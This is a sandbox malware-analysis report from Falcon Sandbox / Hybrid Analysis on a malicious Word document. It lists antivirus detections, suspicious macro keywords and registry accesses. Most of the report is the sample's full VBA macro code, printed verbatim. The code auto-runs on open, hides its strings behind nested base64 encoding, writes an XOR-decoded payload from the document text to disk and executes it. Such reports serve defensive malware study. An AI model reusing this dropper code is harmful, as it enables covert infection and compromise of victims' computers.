3135956e280e61d44f42928899dcb3b0105fb35b53b33f85eaa41bc0ad879d83.doc
This report is generated from a file or URL submitted to this webservice on July 20th 2017 22:02:55 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v6.80 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Contains a remote desktop related string
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 4
-
External Systems
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 24/59 Antivirus vendors marked sample as malicious (40% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 24/59 Antivirus vendors marked sample as malicious (40% detection rate)
- source
- External System
- relevance
- 8/10
-
Sample was identified as malicious by a large number of Antivirus engines
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
-
Found keyword "Workbook_Open" which indicates: "Runs when the Excel Workbook is opened"
Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 2
-
Remote Access Related
-
Contains a remote desktop related string
- details
- "fV;"[Q\hqJ]-vDms'vncS>[Fb..\.;5FO7Ks})!1R" (Indicator for product: Generic VNC)
- source
- File/Memory
- relevance
- 10/10
-
Contains a remote desktop related string
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "MkDir" which indicates: "May create a directory"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Environ" which indicates: "May read system environment variables"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Informative 16
-
Environment Awareness
-
Reads the active computer name
- details
- "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source
- Registry Access
- relevance
- 5/10
-
Reads the cryptographic machine GUID
- details
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
-
Reads the registry for installed applications
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA102")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA103") - source
- Registry Access
- relevance
- 10/10
-
Reads the active computer name
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: ""
File "NewMacros.bas" (Streampath: "VBA/NewMacros") has code: "Option Explicit
Private Const ReichMarkOneMask = 16515072
Private Const ReichMarkTwoMask = 258048
Private Const ReichMarkThreeMask = 4032
Private Const ReichMarkFourMask = 63
Private Const ReichMarkHighMask = 16711680
Private Const ReichMarkMidMask = 65280
Private Const ReichMarkLowMask = 255
Private Const IDontKNowAnyT1hng18 = 262144
Private Const IDontKNowAnyT1hng12 = 4096
Private Const IDontKNowAnyT1hng6 = 64
Private Const IDontKNowAnyT1hng8 = 256
Private Const IDontKNowAnyT1hng16 = 65536
Public Function \xe6(TakeMeHomeless As String) As String
Dim Okurdebele() As Byte, bIn() As Byte, JohnyBeGut(255) As Byte, LouiseXaEr(63) As Long, SoutherShet(63) As Long
Dim MorgulTirit(63) As Long, lQuad As Long, iPad As Integer, Jebaugopjes As Long, MnUhsj As Long, sOut As String
Dim ROhanKurba As Long
TakeMeHomeless = Replace(TakeMeHomeless, vbCr, vbNullString)
TakeMeHomeless = Replace(TakeMeHomeless, vbLf, vbNullString)
ROhanKurba = Len(TakeMeHomeless) Mod 4
If InStrRev(TakeMeHomeless, "=" + Chr(61)) Then
iPad = 2
ElseIf InStrRev(TakeMeHomeless, "" + Chr(61)) Then
iPad = 1
End If
For ROhanKurba = 0 To 255
Select Case ROhanKurba
Case 65 To 90
JohnyBeGut(ROhanKurba) = ROhanKurba - 65
Case 97 To 122
JohnyBeGut(ROhanKurba) = ROhanKurba - 71
Case 48 To 57
JohnyBeGut(ROhanKurba) = ROhanKurba + 4
Case 43
JohnyBeGut(ROhanKurba) = 62
Case 47
JohnyBeGut(ROhanKurba) = 63
End Select
Next ROhanKurba
For ROhanKurba = 0 To 63
LouiseXaEr(ROhanKurba) = ROhanKurba * IDontKNowAnyT1hng6
SoutherShet(ROhanKurba) = ROhanKurba * IDontKNowAnyT1hng12
MorgulTirit(ROhanKurba) = ROhanKurba * IDontKNowAnyT1hng18
Next ROhanKurba
bIn = StrConv(TakeMeHomeless, vbFromUnicode)
ReDim Okurdebele((((UBound(bIn) + 1) \ 4) * 3) - 1)
For Jebaugopjes = 0 To UBound(bIn) Step 4
lQuad = MorgulTirit(JohnyBeGut(bIn(Jebaugopjes))) + SoutherShet(JohnyBeGut(bIn(Jebaugopjes + 1))) + _
LouiseXaEr(JohnyBeGut(bIn(Jebaugopjes + 2))) + JohnyBeGut(bIn(Jebaugopjes + 3))
ROhanKurba = lQuad And ReichMarkHighMask
Okurdebele(MnUhsj) = ROhanKurba \ IDontKNowAnyT1hng16
ROhanKurba = lQuad And ReichMarkMidMask
Okurdebele(MnUhsj + 1) = ROhanKurba \ IDontKNowAnyT1hng8
Okurdebele(MnUhsj + 2) = lQuad And ReichMarkLowMask
MnUhsj = MnUhsj + 3
Next Jebaugopjes
sOut = StrConv(Okurdebele, vbUnicode)
If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
\xe6 = sOut
End Function
Sub Angel()
homonto
End Sub
Sub S1(b As String)
MkDir (b)
End Sub
Sub S2(b As String)
ChDir (b)
End Sub
Sub homonto()
Dim THISMODETWO665216658 As Integer
Dim THISMODEONE230694511 As Integer
Dim THISMODETRZY735394829 As String
Dim THISMODETRZY73539482999 As String
Dim THISMODEONE287249137 As String
Dim THISMODETRZY518630255 As Integer
Dim THISMODETRZY51863025599 As Integer
Dim THISMODETWO862915273 As Paragraph
Dim THISMODETWO221593696 As Long
Dim THISMODETWO594230832 As Boolean
Dim THISMODETWO813299167 As Integer
Dim THISMODETRZY7353948291 As String
Dim THISMODETRZY735394829199 As String
Dim THISMODETWO184374399 As Byte
Dim THISMODETWO18437439999 As Byte
Dim THISMODEONE659174884 As String
Dim THISMODETWO446599250 As String
THISMODETWO446599250 = \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6(\xe6(\xe6("VmtFOVBRPT0="))) + \xe6(\xe6(\xe6("Vm14SlBRPT0="))) + \xe6(\xe6(\xe6(\xe6("VmxFOVBRPT0="))) + \xe6(\xe6(\xe6("VFZFOVBRPT0="))) + \xe6(\xe6(\xe6(\xe6("VmpJMFBRPT0="))) + \xe6(\xe6(\xe6("VTJzMVYySklRbEZXYlhSWFV6RmtSMkpJVG1oU2F6VnZWVzE0ZDFOV2NGWmFSV1JZVW10c00xWXlkRzg9"))) _
+ \xe6(\xe6(\xe6("VmpKS1dXRkVUbHBXWnowOQ=="))) + \xe6(\xe6(\xe6("VjIxMFV3PT0="))) + \xe6(\xe6(\xe6("WVhwR1ZsWlhlR3RoVVQwOQ=="))) + \xe6(\xe6(\xe6("VlcxMGQxTldaRmxqUlhSVlRXc3hORmRyYUZkV01rcFdWMnhTV21GM1BUMD0="))) + \xe6(\xe6(\xe6("WVVWT2EwMVdjRmxVVlZKSFZXc3hSVlpzYUZkTmFsWlFWMVphUzFKc1RuTldiRlpYWWtoQ2IxWlVRbUU9"))) + \xe6(\xe6(\xe6("V1ZkU1NGWnJaR0ZTYkZwd1ZXeG9RMU5zWkZWVWJscHJUVlZLVTFWR1VYZFFVVDA5"))))))) + Chr(61))))))))
THISMODEONE659174884 = \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) + \xe6(\xe6(\xe6(\xe6("VkZaa2QxVkdXVDA9"))) + \xe6(\xe6(\xe6("WVRCd1ZGWlZXbEprZHowOQ==")))) _
+ Chr(61)))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6("VmpGa05GVXhSWGROU0docVVteHZQUT09"))) + \xe6(\xe6(\xe6("VmpGYVJsZHNVbFZXYkhBelZqSjRjMVpzWkhSU2JHaFRZVEozTVZkV1ZtRmpNVmw1VW01S1ZHSnJjRlpaVkVaM1lVWldjVk5yZEZOTlZuQjY="))) _
+ \xe6(\xe6(\xe6(\xe6("Vm14amVHTXhXWGc9"))) + \xe6(\xe6(\xe6("VTFod2FGSnVRbGhVVm1SU1pIYzlQUT09"))) + \xe6(\xe6(\xe6("VjFaU1FrMVdTbkpOVmxwaFVqTkNWRmxuUFQwPQ=="))) + \xe6(\xe6(\xe6("VTBWS2RsWnNaRFJoTVZWNFdrVmtWbUpHY0ZkWlZFcFRWMVphZEU1VlRsZE5WbkJaV2tWVk5WZEhTa2RqUVQwOQ=="))) + \xe6(\xe6(\xe6("WlZacmQxZHRPVmROUkVaWldWVm9TMVl3TVhWaFIwWmhWbnBHU0ZWdFl6az0="))) + \xe6(\xe6(\xe6("VUZFOVBRPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("VjJjOVBRPT0="))) + \xe6(\xe6(\xe6("VmxkU1NGWlVSbHBsUVQwOQ=="))) + \xe6(\xe6(\xe6("VlRKNGMxWXhXa1pYYmtrOQ=="))) + \xe6(\xe6(\xe6("Vm10U1IxTnRWa2hVYTFwb1VqSjNQUT09"))) + \xe6(\xe6(\xe6("VlRKR05sWnVXbGRTYkVwRVZYcEdUbVZHWkhWU2JFNXBWbFp3ZGxaR1pEUlpWVEZIVjI1U2F3PT0="))) + \xe6(\xe6(\xe6("VWpOU1lWWnRkSGROUmxwWVpVWk9XR0pWY0ZwV1JtaHZWMmM5UFE9PQ=="))) + \xe6(\xe6(\xe6("Vm14YWQxZEdjRVphUm1SVVZtMDRPUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("VldwT1ExWkdiSEpYYmxrOQ=="))) + \xe6(\xe6(\xe6("V2tSR2EyTnNXblJQVjJjOQ=="))) + \xe6(\xe6(\xe6("VkZaYVIwNVdWWGxrUjNSb1lrVTFTbFZYZHowPQ=="))) + \xe6(\xe6(\xe6("WVVaV1YwMHdTa2xXVkVKaFdWZE9WMUpzYkdoU2JWSlBXVmh3VjFOV1dYbGtSMFpYVFZFOVBRPT0="))) + \xe6(\xe6(\xe6("VjFoc1ZHRXlVbkZWYlRFMFYxWmFkR1ZIUm1waVJuQjRWVEp6TlZZd01WWmpTSEJYWWxSR2RsbHJaRWRqYkVwVlZsUXdQUT09"))))))))))))))
Dim vEnd669820757 As String
THISMODEONE287249137 = Environ(\xe6(\xe6(\xe6(\xe6(Chr(86) _
+ \xe6(\xe6(\xe6(\xe6(\xe6("VjFkMFlXUXlSa2M9"))) + \xe6(\xe6(\xe6("VjI1R1VsWkZXbFJVVmxwaFpXeGtjbGRuUFQwPQ=="))) + \xe6(\xe6(\xe6("WWpKR1YxTllhRlJpUjFKWlZtMTRTMU5CUFQwPQ=="))) + \xe6(\xe6(\xe6("VjJ0U1IxZHRWa2hUYTJ4VVlrZFNXQT09"))) _
+ \xe6(\xe6(\xe6("Vld4YWQxZEdaRmhrUjBaclRWZFNXRmxSUFQwPQ=="))) + \xe6(\xe6(\xe6("VFROQ2NWVnRNVk5XTVZKV1ZXdGtWMDFXU1QwPQ=="))) + \xe6(\xe6(\xe6("WXpGa2RHUkdjRmRpU0VKWlZtcEplRkl4V25OVGJrcFhWa1phVjFWdGRGWk9VVDA5"))))) _
+ Chr(61)))))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6(\xe6("VkZFOVBRPT0="))) + \xe6(\xe6(\xe6("VmpOQ1VWWnRkRXM9"))) + \xe6(\xe6(\xe6("VlRGV1IxVllZejA9")))) + Chr(61)))) _
+ \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6("Vm1wR2EwNUdWVDA9"))) + \xe6(\xe6(\xe6("VFZWV00xUnNWbXRoYkVwWFYyYzlQUT09"))) + \xe6(\xe6(\xe6("Vmtac1ZWSnVaR3BOVmxvd1ZGWmFUMWRIU2tobFJtUlhUV3BCTVZsVldscGtNazVHV2tad1RsSnVRalpXYWtKaFdWZE5lRlJ1U214U2JrSnZXVlJHZDJJeFduUmpSWFJVVFZWck9RPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("VkZFOVBRPT0="))) + \xe6(\xe6(\xe6("Vm01Q05sWm5QVDA9"))) + \xe6(\xe6(\xe6("Vm5wR2VsWnFSa3BsYlVVOQ=="))) + \xe6(\xe6(\xe6("VW01Q1dGbG5QVDA9"))) + \xe6(\xe6(\xe6("VmtWSmVsZG5QVDA9"))) + \xe6(\xe6(\xe6("VmxaVmVGVXdXbUZqTVc4OQ=="))) + \xe6(\xe6(\xe6("VWpCYVZWVnNhRU5YUm1SWVpFWmFUbFp0VVQwPQ=="))) _
+ \xe6(\xe6(\xe6(\xe6("VldjOVBRPT0="))) + \xe6(\xe6(\xe6("VFZaYWVsbFZaREJXUmtsNA=="))) + \xe6(\xe6(\xe6("VTJ4YVYySlVRWGhWVkVaYVpVWmtXV0pGT1ZkV1IzaGFWMWQwWVdReVZuTmhNMk05"))) + \xe6(\xe6(\xe6("VmpJMFBRPT0="))) + \xe6(\xe6(\xe6("Vkd4a1RnPT0="))) + \xe6(\xe6(\xe6("Vm0xM01sWnNZekZaVmxsM1RWaFdhRkl3V1QwPQ=="))) + \xe6(\xe6(\xe6("V1ZaYU5sSnJhRlpOUjFKSVZUQmFTMk14VW5SaVJsSlRWbGhDVEZadGNFZFZiRUpTVUZFOVBRPT0="))) + \xe6(\xe6(\xe6("VUZFOVBRPT0="))))) _
+ \xe6(\xe6(\xe6("VTFob1ZVMVZiRFZXUjNSdllVWkplV0ZJVGxwaE1YQXlWRlphWVdSQlBUMD0="))) + \xe6(\xe6(\xe6("VkZaU1UxWXdNVmc9"))) + \xe6(\xe6(\xe6("WlVab1YwMVhhSFpXTUdSTFVqSk9SazlXWkdsU2JrRTk="))) + \xe6(\xe6(\xe6("WVVac2NWSnVaRmhTTURROQ=="))) + \xe6(\xe6(\xe6("VW14T2MxRnNXbGRTUlVVeA==")))))))))))))
If Len(dir(THISMODEONE287249137, vbDirectory)) = 0 Then
S1 (THISMODEONE287249137)
Else:
Wipedir (THISMODEONE287249137)
S1 (THISMODEONE287249137)
End If
THISMODETRZY735394829 = \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) + \xe6(\xe6(\xe6(\xe6(\xe6("VmtFOVBRPT0="))) + \xe6(\xe6(\xe6("Vm1jOVBRPT0="))) _
+ \xe6(\xe6(\xe6("V2toa1ZsSm5QVDA9"))) + \xe6(\xe6(\xe6("VjJjOVBRPT0="))) + \xe6(\xe6(\xe6("WTJjOVBRPT0="))) + \xe6(\xe6(\xe6("VlRKM1BRPT0="))) + \xe6(\xe6(\xe6("Vkd4WlBRPT0="))) + \xe6(\xe6(\xe6("VldjOVBRPT0="))) + \xe6(\xe6(\xe6("WWtFOVBRPT0="))) + \xe6(\xe6(\xe6("VW1wTlBRPT0="))))) _
+ Chr(61)))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6("Vm1jOVBRPT0="))) + \xe6(\xe6(\xe6("VFZkUlBRPT0="))) + \xe6(\xe6(\xe6("VGtkSlBRPT0="))) + \xe6(\xe6(\xe6("VFZWV05BPT0="))) + \xe6(\xe6(\xe6("VmtkMGF3PT0="))) + \xe6(\xe6(\xe6("WVZaS2MxZHNUbGRoZHowOQ=="))) + \xe6(\xe6(\xe6("Vm0xR1Z3PT0="))) + \xe6(\xe6(\xe6("Vm14YU1Ga3pjRWRYUjBwSVpIb3dQUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0xNGF3PT0="))) + \xe6(\xe6(\xe6("WkVaS2RHRkdaRTVUUlVwSlZqRlNRMWxYU1hoYVJXTTk="))) + \xe6(\xe6(\xe6("VmpGb2QxWnRTbkpqUm1oWFlURmFNdz09"))) + \xe6(\xe6(\xe6("VmxWWlBRPT0="))) + \xe6(\xe6(\xe6("VjI1R1UySlZXbkpXYlhoaFpWWlJQUT09"))) + \xe6(\xe6(\xe6("WWtad2NsWlJQVDA9"))) + \xe6(\xe6(\xe6("VFd0V05sVlJQVDA9"))) + \xe6(\xe6(\xe6("WVdzMVdGbFVSbmM9"))) + \xe6(\xe6(\xe6("WVVaa1VsQlJQVDA9"))) + \xe6(\xe6(\xe6("VUZFOVBRPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0weE5GZFdXblJrUjNSWVVuYzlQUT09"))) + \xe6(\xe6(\xe6("VWxoc2FBPT0="))) + \xe6(\xe6(\xe6("VWxSc1dGUlZZejA9"))) + \xe6(\xe6(\xe6("Vld4UlBRPT0="))) + \xe6(\xe6(\xe6("Vm0xdlBRPT0="))) + \xe6(\xe6(\xe6("VW14alBRPT0="))) + \xe6(\xe6(\xe6("V2tWalBRPT0="))) + \xe6(\xe6(\xe6("Vm1jOVBRPT0="))) + \xe6(\xe6(\xe6("VTBaSlBRPT0="))) + \xe6(\xe6(\xe6("WWtkU2NGVm5QVDA9"))) + \xe6(\xe6(\xe6("WVROQ1dWWnRkejA9"))) + \xe6(\xe6(\xe6("V1hwR1ZFMVJQVDA9"))) + \xe6(\xe6(\xe6("Vm1jOVBRPT0="))) + \xe6(\xe6(\xe6("VmpGWlBRPT0="))) + \xe6(\xe6(\xe6("WWtaYVQxVnJaSG89"))) + \xe6(\xe6(\xe6("VUZFOVBRPT0=")))) + Chr(61))))))))))
ChDrive (THISMODEONE287249137)
S2 (THISMODEONE287249137)
THISMODETRZY518630255 = FreeFile()
Open THISMODETRZY735394829 For Binary As THISMODETRZY518630255
THISMODEONE230694511 = 0
For Each THISMODETWO862915273 In ActiveDocument.Paragraphs
DoEvents
THISMODETRZY7353948291 = THISMODETWO862915273.Range.Text
THISMODETWO221593696 = 1
THISMODEONE230694511 = THISMODEONE230694511 + 1
If THISMODEONE230694511 >= 24 Then
While (THISMODETWO221593696 < Len(THISMODETRZY7353948291))
THISMODETWO184374399 = THISMODETWO446599250 & Mid(THISMODETRZY7353948291, THISMODETWO221593696, 2)
THISMODETWO184374399 = THISMODETWO184374399 Xor &H33
Put #THISMODETRZY518630255, , THISMODETWO184374399
THISMODETWO221593696 = THISMODETWO221593696 + 2
Wend
End If
Next
Close #THISMODETRZY518630255
THISMODETRZY7353948293 (THISMODETRZY735394829)
End Sub
Public Sub Wipedir(okokok As String)
Dim OOO
Set OOO = CreateObject(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) _
+ Chr(109) + \xe6(\xe6(\xe6(\xe6("VkZaa2QxVkdXbkpUVkRBOQ==")))) + \xe6(\xe6(\xe6(\xe6("VmxkNFExWlZNVUpRVkRBOQ==")))) + Chr(61)))) _
+ \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6("Vm1wR2EwNUhTWGxUVVQwOQ=="))) + \xe6(\xe6(\xe6("WlVaa2NscEdaR2hpU0VKVlYxZDBWMlF5VFhoWGJsRTk="))) + \xe6(\xe6(\xe6("V2xWb2EySkhTVDA9"))) + \xe6(\xe6(\xe6("VWpOak9RPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0xNGF3PT0="))) + \xe6(\xe6(\xe6("WTJzNVdHRkdaR2hOYm1ONVZqRmFWMWxSUFQwPQ=="))) + \xe6(\xe6(\xe6("VmxSR2ExSXhaSFZWYkZwWVVqRktXRmRuUFQwPQ=="))) + \xe6(\xe6(\xe6("VmpOU00xVjZSbmRXYkdSMFpFZDBWMkpJUVhkWFVUMDk="))) + \xe6(\xe6(\xe6("VFVad1VGbFdXbUZqYlU1RlZsUXdQUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0wd2QyUXlWVDA9"))) + \xe6(\xe6(\xe6("VWxSV1NGWkdhRzlXVjBwSVZXNUdWbUpCUFQwPQ=="))) + \xe6(\xe6(\xe6("VjI1a2FGSnNXbm89"))) + \xe6(\xe6(\xe6("VjJ0YVQyRlZNVmhsU0d4WFlsUldVRlpIYzNoWFFUMDk="))) + \xe6(\xe6(\xe6("V2tWU1QxWXlTbFZXYkVFOQ=="))) + \xe6(\xe6(\xe6("Vm0xd1FtVkhUblJVYTJScVVtMDRPUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0xNFlXUXhXVDA9"))) + \xe6(\xe6(\xe6("VW14c05WUldWbUZpUmtsM1RsVnZQUT09"))) + \xe6(\xe6(\xe6("VmxSS05GbFhSbGRhUlZwT1ZrWkpQUT09"))) + \xe6(\xe6(\xe6("VmpGYVJsZHRhR0ZTUlZwTFdsWmFTMk50UmtnPQ=="))) + \xe6(\xe6(\xe6("WWtaT2FHVnNXbEZXYkdRd1dWWkpkMDFJYUZoaWJFcFBWbXRGT1ZCUlBUMD0=")))) _
+ \xe6(\xe6(\xe6(\xe6("VmxkM1BRPT0="))) + \xe6(\xe6(\xe6("V2tVMVYwMHlhR0ZXYlhSaFlqSk5lRmRuUFQwPQ=="))) + \xe6(\xe6(\xe6("WkVaS1dXSkhhRk5pU0VKb1ZtMXpQUT09"))) + \xe6(\xe6(\xe6("Vm01a2EySkhkekpWYldNNVVGRTlQUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm1wS1UxSnJOVmRYYkZacFVteHdVQT09"))) + \xe6(\xe6(\xe6("Vm0weE1HUXhZejA9"))) + \xe6(\xe6(\xe6("Vm14d01GUldVbE5YWnowOQ=="))) + \xe6(\xe6(\xe6("Vm0xNFIwNUdXblJsUm1SVg=="))) + \xe6(\xe6(\xe6("WWtWd1JsVldVbkpRVVQwOQ=="))))))) + \xe6(\xe6(\xe6(Chr(86) + \xe6(\xe6(\xe6("VmxadlBRPT0="))) + \xe6(\xe6(\xe6("VW1zNFBRPT0="))) + \xe6(\xe6(\xe6("Vm10S1UxVkdVWGM9"))) + Chr(61)))))))))
If OOO.folderexists(okokok) Then
OOO.deletefolder okokok
Else
End
End If
End Sub
Sub Shits(vbHH As String)
Dim OBsGG
OBsGG = Shell(vbHH, 1)
End Sub
Sub THISMODETRZY7353948293(THISMODETRZY7353948290 As String)
Dim THISMODETWO665216658 As Integer
Dim THISMODEONE287249137 As String
THISMODEONE287249137 = Environ(\xe6(\xe6(\xe6(\xe6(Chr(86) + \xe6(\xe6(\xe6("WWtad2FBPT0="))) + \xe6(\xe6(\xe6("Vm1wQk1RPT0="))) + \xe6(\xe6(\xe6("VWpGV2MxcEdhRmRTUlVVMQ==")))))) _
+ \xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6("VFZFOVBRPT0="))) + \xe6(\xe6(\xe6("WldjOVBRPT0="))) + \xe6(\xe6(\xe6("VkZaYVNtVkdaSE5oUjNoVFZrZDRXRlp0TUQwPQ=="))) + \xe6(\xe6(\xe6("WlVkR2JGWnNSalJXYlRFd1ZqRktjMk5HY0ZwV1ZscHhWVVpGT1E9PQ=="))) + Chr(61)))))) _
+ \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6("VFZkdlBRPT0="))) + \xe6(\xe6(\xe6("VkRGYVExVnNRbFZOUVQwOQ=="))) + Chr(61)))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6("VmpGa05GVXhSWGRPVldScVVsRTlQUT09"))) + \xe6(\xe6(\xe6("Vm14T2FFMVlRbnBXVnpBOQ=="))) + \xe6(\xe6(\xe6("VFZaT1dHSkhlRmRXTWpBMVlVWlpkdz09"))) _
+ \xe6(\xe6(\xe6("WTBWalBRPT0="))) + \xe6(\xe6(\xe6("VjFSQ1lXTXhaRWRYYms1VVlUTm9ZVmxYZEdGaFJscHhVMnQwVTAxUlBUMD0="))) + \xe6(\xe6(\xe6("VjI1T1ZtSlhkejA9"))) + \xe6(\xe6(\xe6("VmpGSmVtRkdjRmRpVkVJeldsVlZQUT09"))) + \xe6(\xe6(\xe6("VGxWb1YySkhVbWhWTUZaM1ZuYzlQUT09"))) + \xe6(\xe6(\xe6("VjFkMFZrMVdaRWRWYkdoclUwZFNWVlp0TlVOV01WbDVUbEU5UFE9PQ=="))) _
+ \xe6(\xe6(\xe6("VkRGa2N3PT0="))) + \xe6(\xe6(\xe6("VjI1TlBRPT0="))) + \xe6(\xe6(\xe6("V1RCYWMxWXhXVDA9"))) + \xe6(\xe6(\xe6("VFRGS01sWnFTalJYYlZaMFVtdG9hQT09"))) + \xe6(\xe6(\xe6("VWpCYVZGbHJhRU5UVm1SVlUxaG9WUT09"))) + \xe6(\xe6(\xe6("VFZWc05WWkhkRzloUmtsNVlVaE9XbUV4Y0RKVVZsazk="))) + \xe6(\xe6(\xe6("VjI1U1RsWkdTbGhVVm1RMFYwWlplR0ZIT0QwPQ=="))) _
+ \xe6(\xe6(\xe6("Vm5jOVBRPT0="))) + \xe6(\xe6(\xe6("VWpCd1NGbDNQVDA9"))) + \xe6(\xe6(\xe6("VWxSc1dGbHJXbmRoUm14eFVtNWtXRkl3TlVkVk1uYzk="))) + \xe6(\xe6(\xe6("VVd4YVYxSkZSVEU9")))))))))))))
ChDrive (THISMODEONE287249137)
S2 (THISMODEONE287249137)
Shits (THISMODEONE287249137 + \xe6(\xe6(\xe6(\xe6(Chr(86) _
+ \xe6(\xe6(\xe6("WVdjOVBRPT0="))) + \xe6(\xe6(\xe6("VVd4a2FBPT0="))) + \xe6(\xe6(\xe6("WWxaYVNWWnROVXRpUmswOQ=="))) + \xe6(\xe6(\xe6("VW10d1dWZFJQVDA9"))) + \xe6(\xe6(\xe6("VmpOb1RGbFZXbUZXTVZaWldrWkdWZz09"))) + \xe6(\xe6(\xe6("VmtSQk5RPT0=")))))) + \xe6(\xe6(\xe6(Chr(86) _
+ \xe6(\xe6(\xe6("Vmxad1IxUXhXa05WYkVKVlRVRTlQUT09"))) + Chr(61))))))
End Sub
Sub AutoOpen()
Angel
End Sub
Private Sub Workbook_Open()
Angel
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\msoF72F.tmp"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
